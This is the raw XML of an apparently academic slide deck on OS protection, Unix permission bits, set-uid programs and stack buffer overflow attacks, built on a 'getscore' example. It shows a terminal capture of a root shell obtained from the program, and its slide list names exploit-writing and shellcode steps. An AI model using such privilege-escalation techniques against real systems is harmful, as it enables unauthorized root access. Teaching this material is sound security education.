              <a:t>sh-2.05b#</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000"/>
              <a:t>sh-2.05b# whoami</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000"/>
              <a:t>root</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000"/>
              <a:t>sh-2.05b# </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="200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436C14-B879-2C40-816B-FEC812EA82CA}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1400"/>
              <a:pPr/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Thoughts: Need for Protection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OS protection prevents applications from interfering with each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other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 application may be compromised due to vulnerabilities in it.</a:t>
            </a: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Protection mechanisms are limited by the possible vulnerabilities in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privileged applications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system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code.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6355B3-A84B-E84E-B7AE-582A66B54CED}" type="slidenum">
              <a:rPr lang="en-US" sz="1400"/>
              <a:pPr/>
              <a:t>36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7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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>look at a concrete example</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" alt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 want to write a program that reports the course scores to you.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Requirements:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Every student can only get his/her score</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Maintain all students</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t> scores in a file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Local command-line operation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E8D03C-A3E9-BD43-ADA7-2D5527C3C669}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1400"/>
              <a:pPr/>
              <a:t>4</a:t>
            </a:fld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Score file format</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp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19200" y="2057400"/>
            <a:ext cx="6781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/>
              <a:t>[root@localhost getscore]# cat score.txt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800"/>
              <a:t>Mary Doe:123-45-6789:A+:…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800"/>
              <a:t>Tom Smith:567-89-1234:B:…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371600" y="3810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User name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63863" y="3870325"/>
            <a:ext cx="1509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Student SSN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953000" y="3886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Score</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17414" name="AutoShape 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1981200" y="3352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3429000" y="3357563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416" name="AutoShape 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="3352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41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9AB06C-26D2-3444-B92C-171B140D8102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little </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP"/>
              <a:t>getscore</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP"/>
              <a:t> program</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US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name and SSN for authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Score file only readable to user root</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>A program reads the score file and report the grade to an authenticated user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7543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nl-NL" altLang="en-US" sz="2000"/>
              <a:t>[root@localhost]# ls -l</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" sz="2000"/>
              <a:t>total 24</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" sz="2000"/>
              <a:t>-rw-------    1 root     root           46 Aug 20 11:35 score.txt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" sz="2000"/>
              <a:t>-rw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" sz="2000"/>
              <a:t>r-xr-x    1 root     root        12947 Aug 20 11:36 getscore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8200" y="56546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Setuid bit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V="1">
            <a:off x="1357313" y="5392738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024A918-6E55-8C46-A3A2-DF809CD5A50D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Unix file system basics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 of a file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[root@localhost course_scores]# ls -l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total 20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-rwsr-xr-x    1 root     root        13587 Aug  25  2009 getscore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-rw-------      1 root     root              88 Aug  25  2009 score.txt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1600200"/>
            <a:ext cx="3200400" cy="2438400"/>
            <a:chOff x="457200" y="1600200"/>
            <a:chExt cx="3200400" cy="243840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57200" y="3276600"/>
              <a:ext cx="1295400" cy="7620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26" name="Line Callout 2 12"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2057400" y="1600200"/>
              <a:ext cx="1600200" cy="685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4519"/>
                <a:gd name="adj6" fmla="val -545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/>
                <a:t>Permission bits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57400" y="1600200"/>
            <a:ext cx="2819400" cy="2438400"/>
            <a:chOff x="2057400" y="1600200"/>
            <a:chExt cx="2819400" cy="24384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57400" y="3276600"/>
              <a:ext cx="609600" cy="7620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24" name="Line Callout 2 14"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3810000" y="1600200"/>
              <a:ext cx="1066800" cy="685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2685"/>
                <a:gd name="adj6" fmla="val -1252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/>
                <a:t>Owner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19400" y="1600200"/>
            <a:ext cx="3200400" cy="2438400"/>
            <a:chOff x="2819400" y="1600200"/>
            <a:chExt cx="3200400" cy="24384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819400" y="3276600"/>
              <a:ext cx="685800" cy="762000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22" name="Line Callout 2 16"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5105400" y="1600200"/>
              <a:ext cx="914400" cy="685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4519"/>
                <a:gd name="adj6" fmla="val -2154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/>
                <a:t>Group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" y="4459288"/>
            <a:ext cx="8534400" cy="1901825"/>
            <a:chOff x="76200" y="4459069"/>
            <a:chExt cx="8534400" cy="1902262"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="21512" name="AutoShape 9"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="533400" y="5181600"/>
              <a:ext cx="609600" cy="5334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13" name="AutoShape 10"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2209800" y="5181600"/>
              <a:ext cx="609600" cy="5334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14" name="AutoShape 11"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3810000" y="5181600"/>
              <a:ext cx="609600" cy="5334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>
              <a:off x="5562600" y="5181600"/>
              <a:ext cx="609600" cy="5334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516" name="Text Box 5"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="76200" y="57150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accent2"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>directory bit</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="21517" name="Text Box 5"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1752600" y="5715000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accent2"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>owner permissions</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="21518" name="Text Box 5"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3352800" y="5715000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accent2"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>group permissions</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="21519" name="Text Box 5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accent2"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>other user permissions</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="21520" name="Rectangle 20"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="457200" y="4459069"/>
              <a:ext cx="8153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/>
                <a:t>d: directory  r:read  w:write x:execute (access a directory)  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US" sz="2000">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>s:set-uid bit</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US" sz="2000"/>
                <a:t>{[d,-]} {[r,-] [w,-] [x,s,-]} {[r,-] [w,-] [x,s,-]} {[r,-] [w,-] [x, -]}</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2151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E2B06BF-0D1A-514F-8B79-CAD02CD77ACF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Unix set-uid mechanism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/>
              <a:t>A user can execute a program if the program file has “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2600"/>
              <a:t>x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2600"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2600"/>
              <a:t> bit set for the user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Typically the program process will have the invoker’s privilege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If the program file also has the set-uid bit set for the owner (“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2600"/>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2600"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2600"/>
              <a:t> is shown for the owner), then the program will also have the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>program owner</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2600"/>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2600"/>
              <a:t>s privilege. We call such programs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2600"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2600"/>
              <a:t>set-uid programs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2600"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2600"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="260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7E7A4C-3059-FC41-B64D-055B9266049A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altLang="en-US" sz="2400"/>
              <a:t>Provides a path for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" i="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>privilege elevation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000"/>
              <a:t>There are legitimate needs for elevating a process</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2000"/>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000"/>
              <a:t> privilege to perform its jobs, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" i="1"/>
              <a:t>e.g.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000"/>
              <a:t> “passwd” command.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400"/>
              <a:t>(Simplified version) Two user id fields in a process</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2400"/>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400"/>
              <a:t>s PCB: real user id (ruid), and effective user id (euid)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" i="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>It is the euid that matters in OS access control.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000"/>
              <a:t>non-setuid programs will have both fields set to the id of the invoker when the program is started.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000"/>
              <a:t>Setuid programs have ruid set to the invoker, but euid set to the owner of the executable when started.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000"/>
              <a:t>There are programming interfaces for changing the two uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2000"/>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000"/>
              <a:t>s during the program</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2000"/>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000"/>
              <a:t>s execution, and rules on which changes are allowed.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="200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3FFC32-CBC5-104E-B944-140FE6D6B0D9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355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set-uid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2508</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>623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ＭＳ Ｐゴシック</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Default Design</vt:lpstr>
      <vt:lpstr>Protection and Compromise</vt:lpstr>
      <vt:lpstr>What is Protection?</vt:lpstr>
      <vt:lpstr>Some Examples</vt:lpstr>
      <vt:lpstr>Let’s look at a concrete example</vt:lpstr>
      <vt:lpstr>Score file format</vt:lpstr>
      <vt:lpstr>Our little “getscore” program</vt:lpstr>
      <vt:lpstr>Unix file system basics</vt:lpstr>
      <vt:lpstr>Unix set-uid mechanism</vt:lpstr>
      <vt:lpstr>Unix set-uid mechanism</vt:lpstr>
      <vt:lpstr>Getting your score</vt:lpstr>
      <vt:lpstr>Security problems in getscore</vt:lpstr>
      <vt:lpstr>Let’s try this</vt:lpstr>
      <vt:lpstr>32-bit x86 CPU registers</vt:lpstr>
      <vt:lpstr>Linux process memory map</vt:lpstr>
      <vt:lpstr>Calling a function</vt:lpstr>
      <vt:lpstr>Calling a function</vt:lpstr>
      <vt:lpstr>Calling a function</vt:lpstr>
      <vt:lpstr>Calling a function</vt:lpstr>
      <vt:lpstr>Stack buffer overflow attack</vt:lpstr>
      <vt:lpstr>Returning from a function</vt:lpstr>
      <vt:lpstr>Returning from a function</vt:lpstr>
      <vt:lpstr>Stack overflow attack</vt:lpstr>
      <vt:lpstr>Stack overflow attack</vt:lpstr>
      <vt:lpstr>Stack overflow attack</vt:lpstr>
      <vt:lpstr>Stack overflow attack</vt:lpstr>
      <vt:lpstr>Playing with getscore</vt:lpstr>
      <vt:lpstr>Buffer overflow vulnerability</vt:lpstr>
      <vt:lpstr>Setuid and buffer overflow</vt:lpstr>
      <vt:lpstr>Writing a buffer overflow exploit</vt:lpstr>
      <vt:lpstr>Shell code to use</vt:lpstr>
      <vt:lpstr>Creating a malicious input</vt:lpstr>
      <vt:lpstr>Some useful Linux commands</vt:lpstr>
      <vt:lpstr>Some useful gdb commands</vt:lpstr>
      <vt:lpstr>Hints</vt:lpstr>
      <vt:lpstr>Getting a root shell</vt:lpstr>
      <vt:lpstr>Thoughts: Need for Protection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Ou, Xinming</cp:lastModifiedBy>
  <cp:revision>340</cp:revision>
  <cp:lastPrinted>2009-04-22T19:24:48Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2011-08-25T19:33:04Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-08-29T19:29:42Z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